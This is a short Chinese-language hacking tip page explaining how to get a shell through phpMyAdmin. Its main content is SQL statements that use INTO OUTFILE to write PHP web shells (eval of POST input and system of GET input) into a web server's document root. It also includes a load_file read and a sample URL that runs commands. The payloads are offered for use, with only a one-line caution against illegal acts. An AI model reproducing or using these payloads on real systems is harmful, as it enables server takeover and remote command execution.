phpmyadmin拿shell技巧
发布时间:2011-02-27 18:47:14作者:知识屋
Create TABLE st4dy (cmd text NOT NULL);
Insert INTO st4dy (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('<?php @system($_GET[cmd]);?>');
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------
而后在国外论坛上看到一老外的方法更简单:
1:select load_file('E:/xamp/www/st4dy.php');
2:select '<?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>' INTO OUTFILE 'E:/xamp/www/st4dy.php'
然后访问网站目录:http://localhost/st4dy.php?cmd=dir
3:写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/st4dy.php'
第三个是直接在SQL查询里导出一句话,必须要先知道网站的路径
别做违法的事情奥~
相关知识
![[XDCTF]Shellcode DIY](http://file.zhishiwu.com/allimg/c140428/13bAb4R5260-135607.jpg)
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
